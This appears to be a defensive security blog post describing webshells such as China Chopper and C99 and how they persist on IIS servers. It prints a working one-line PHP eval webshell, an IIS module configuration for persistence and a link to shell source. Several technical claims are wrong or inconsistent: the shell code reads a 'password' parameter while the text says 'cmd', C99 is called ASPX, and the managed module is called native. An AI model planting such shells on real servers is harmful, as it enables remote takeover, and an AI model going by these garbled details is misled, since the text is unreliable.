Introduction
Webshells, a deceptively simple yet powerful tool in the hands of cyber adversaries, pose a critical threat to web servers and the data they hold. These malicious scripts infiltrate vulnerable web applications, providing unauthorised remote access to attackers. In this technical blog, we will explore the inner workings of common webshells such as PHP-based China Chopper and ASPX-based C99, understanding their functionality, and how they can persist through IIS servers. By dissecting these stealthy threats, we aim to empower cybersecurity professionals with the knowledge needed to safeguard web infrastructures effectively.
Webshell Fundamentals
Webshells are lightweight scripts or code snippets designed to exploit web application vulnerabilities, such as SQL injection or Remote File Inclusion (RFI). These malicious entities are deployed via web-based interfaces, enabling attackers to interact with the compromised server remotely.
The China Chopper Webshell
China Chopper, a widely-used PHP-based webshell, is notorious for its compact sise and evasive capabilities. Let’s examine a simplified version of its code:
<?php @eval($_POST['password']);?>When injected into a vulnerable web application, this webshell listens for HTTP requests with a “cmd” parameter, allowing attackers to execute arbitrary commands on the server and obtain the output.
The C99 ASPX Webshell
The C99 webshell, written in ASPX, is another prevalent threat targeting Microsoft IIS servers. Its functionality is more extensive than China Chopper, enabling file management, database interactions, and more. Code can be found at https://github.com/dangerover/r57c99/
Once embedded into an ASPX-based web application, C99 can execute arbitrary commands and interact with the server’s filesystem and resources.
Evasion Techniques
Webshells utilise evasion techniques to avoid detection by security solutions and administrators. These tactics include obfuscating the code, using encrypted communication channels, and employing random names and locations to make detection more challenging.
Linkage to IIS Servers
To persist on IIS servers, webshells employ hooks by leveraging IIS Native Modules. By registering custom HTTP handlers, webshells ensure execution with each HTTP request:
<configuration>
<system.webServer>
<modules>
<add name="WebShellModule" type="WebShellHandler, WebShellModule" preCondition="managedHandler" />
</modules>
</system.webServer>
</configuration>This IIS Native Module configuration enables webshells to intercept incoming requests, execute their malicious code, and maintain unauthorised access.
Conclusion
Webshells, represented by China Chopper and C99, embody the stealthy and ever-evolving threat landscape faced by web servers and applications. Their lightweight nature and evasion techniques make them elusive adversaries. Understanding the intricacies of these webshells and their linkage to IIS servers is paramount for fortifying web infrastructures. Cybersecurity professionals must deploy rigorous audits, code reviews, and web application firewalls to detect and mitigate webshell intrusions proactively. Staying ahead of the constantly evolving webshell landscape will empower organisations to secure their web servers, preserving data integrity and mitigating the risk of crippling cyberattacks. Vigilance, combined with technical expertise, is the ultimate defense against these stealthy cyber adversaries.